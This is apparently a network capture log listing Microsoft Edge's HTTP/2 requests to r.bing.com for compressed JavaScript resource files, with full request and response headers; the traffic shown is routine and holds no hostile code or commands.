last-modified: Tue, 24 Sep 2024 06:47:16 GMT
etag: 0x8DCDC64BACB4BE8
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 76a2f751-201e-0006-09f6-161de8000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=113744
expires: Sat, 19 Oct 2024 04:39:29 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac4071
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/aj9VOivqSueJ9SugNuHsiq8s6rw.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/aj9VOivqSueJ9SugNuHsiq8s6rw.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Fri, 27 Sep 2024 00:31:06 GMT
etag: 0x8DCDE8BAD4877C1
content-length: 1911
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: dwQ5sPlzVYoK4C862/OvRQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 0f7e1603-c01e-0007-01c5-171c15000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=212143
expires: Sun, 20 Oct 2024 07:59:28 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac407e
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/X9zPQVZQzKFTYze2B2WNn1LJCS4.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/X9zPQVZQzKFTYze2B2WNn1LJCS4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:32:07 GMT
etag: 0x8DCDC629CF7A282
content-length: 172
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: TLwZhqYro/p02/6N++ZW5g==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c41191e3-201e-0006-43ea-181de8000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=65502
expires: Fri, 18 Oct 2024 15:15:27 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac4080
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/XvPs3zdtm8Xfl-ujR40Xu7FW0LI.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/XvPs3zdtm8Xfl-ujR40Xu7FW0LI.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 413
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: CSVeibf2oORAtuBGI1XXTQ==
last-modified: Tue, 24 Sep 2024 06:33:04 GMT
etag: 0x8DCDC62BE862985
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 22cd3d8e-801e-0029-3c0a-189cd2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=426123
expires: Tue, 22 Oct 2024 19:25:48 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac4081
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/RvRBoZ5KQDNHwbHfo-_ZBZIoYQo.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/RvRBoZ5KQDNHwbHfo-_ZBZIoYQo.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:24:00 GMT
etag: 0x8DCDC617A7BA9F4
content-length: 792
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 3LAdJkykvHw5zfSSu6AY7w==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8c759597-301e-0056-56c7-1702e0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=211665
expires: Sun, 20 Oct 2024 07:51:30 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac4082
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/lcj8996lLPHohM7LK16sWWtGSzE.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/lcj8996lLPHohM7LK16sWWtGSzE.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:55:31 GMT
etag: 0x8DCDC65E1C9F0B5
content-length: 1451
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 7Zu2tGJpZ69JX58tozVjPQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 95884351-701e-0078-80f7-168227000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=223546
expires: Sun, 20 Oct 2024 11:09:31 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac40d6
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/IpXJDHKzfGJAg49_x5sRfvVvsvk.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/IpXJDHKzfGJAg49_x5sRfvVvsvk.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:10:06 GMT
etag: 0x8DCDC5F892CA35E
content-type: text/javascript; charset=utf-8
content-md5: OAAEPZ6Y2Cv5Tvx1MtCI8g==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1cb82408-301e-0030-2923-15b0ba000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 4188
vary: Accept-Encoding
cache-control: public, no-transform, max-age=311514
expires: Mon, 21 Oct 2024 11:35:39 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac40d7
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/HqDsKR6xyRoUSYXXRfEdLVt772I.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/HqDsKR6xyRoUSYXXRfEdLVt772I.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 304
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: PX2MCYqpUzo58j8uZ/WgUQ==
last-modified: Tue, 24 Sep 2024 06:08:01 GMT
etag: 0x8DCDC5F3F15CCC5
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 04108e64-601e-000a-1875-17f319000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=424130
expires: Tue, 22 Oct 2024 18:52:35 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac40d8
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/rbBaKhtkLVke-4PIWp9e6AV5_kg.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/rbBaKhtkLVke-4PIWp9e6AV5_kg.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: text/javascript; charset=utf-8
content-md5: Mq4wUdUzpndWE0KYk432SA==
last-modified: Tue, 24 Sep 2024 06:42:09 GMT
etag: 0x8DCDC6403579AF9
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 510fccff-601e-0001-7a19-18eb6d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 8536
vary: Accept-Encoding
cache-control: public, no-transform, max-age=52459
expires: Fri, 18 Oct 2024 11:38:04 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac40db
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/t5vZ9VqTO-Sl4hN969ySbvZgV0g.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/t5vZ9VqTO-Sl4hN969ySbvZgV0g.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 137
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: Og9E4hQ7kK2Nl9gLjPaFIg==
last-modified: Thu, 10 Oct 2024 12:57:52 GMT
etag: 0x8DCE92B26DAAB1E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5aacefbf-001e-001a-04e8-1ec5ff000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=218975
expires: Sun, 20 Oct 2024 09:53:20 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac40dc
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/cevyAKMYXDq2u5yDO1sFDbbTMgg.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/cevyAKMYXDq2u5yDO1sFDbbTMgg.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 146
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: Mu+4u1+ZO0orsL04es/kgA==
last-modified: Tue, 24 Sep 2024 07:14:32 GMT
etag: 0x8DCDC688977670C
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 32a396b8-401e-0016-615c-152b0e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=253909
expires: Sun, 20 Oct 2024 19:35:34 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac40dd
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/8AT4k6M1NxoPNq97XvXDekwj0CU.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/8AT4k6M1NxoPNq97XvXDekwj0CU.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 05:54:26 GMT
etag: 0x8DCDC5D58D85446
content-length: 328
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: RyGzYQ1bPsIUh6P5T7D2GQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6c99c007-701e-003c-7b59-155e4b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=321932
expires: Mon, 21 Oct 2024 14:29:17 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac40de
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/y1tiMssL1_ZRGIkBjxDYmR2kX8o.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/y1tiMssL1_ZRGIkBjxDYmR2kX8o.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 05:57:17 GMT
etag: 0x8DCDC5DBF196327
content-length: 2034
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: JuCBhPh6xDth0S/5BnDYIA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 30f7e066-401e-0070-442c-189954000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=165657
expires: Sat, 19 Oct 2024 19:04:42 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac40df
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/8w26ODmd1hk4C30WJtfkdBYFSfE.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/8w26ODmd1hk4C30WJtfkdBYFSfE.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:08:47 GMT
etag: 0x8DCDC5F5A463EFF
content-type: text/javascript; charset=utf-8
content-md5: rG7VUMX4iQJJxBP5sPK0bw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 22159353-401e-0059-63fc-15ef16000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-length: 1494
akamai-grn: 0.c0777b5c.1728117582.39678dbe
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=134728
expires: Sat, 19 Oct 2024 10:29:13 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac40e1
timing-allow-origin: *
GET

https://r.bing.com/rp/AsdMf7D6KLdP5SQOeuSIZtV8-sA.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/AsdMf7D6KLdP5SQOeuSIZtV8-sA.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:02:51 GMT
etag: 0x8DCDC5E8650E75C
content-length: 526
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: OE66trga7eniXfEauP76xA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 631dc5ed-d01e-005c-3e47-161b69000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=44207
expires: Fri, 18 Oct 2024 09:20:32 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac40e2
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/buUaCZ-qbYO2tqBHHU578PNjjZc.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/buUaCZ-qbYO2tqBHHU578PNjjZc.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:57:42 GMT
etag: 0x8DCDC662FCCB149
content-type: text/javascript; charset=utf-8
content-md5: ofKtvEh5ABtGyUoMNka3Xw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1a710ad7-e01e-0039-78c7-14aa34000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 852
vary: Accept-Encoding
cache-control: public, no-transform, max-age=170679
expires: Sat, 19 Oct 2024 20:28:24 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac40e3
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/IEsUJAq41KbrXKW7f2nmdJPCUXs.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/IEsUJAq41KbrXKW7f2nmdJPCUXs.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:44:16 GMT
etag: 0x8DCDC644F5E5FC5
content-length: 1076
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: oqLg+91b3FmpcS7e8iKMsQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5ae0b016-001e-0011-7a69-16dd8b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=26750
expires: Fri, 18 Oct 2024 04:29:35 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac40e6
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/EUVdjTinS37NjfSnARYo0K9VebI.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/EUVdjTinS37NjfSnARYo0K9VebI.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

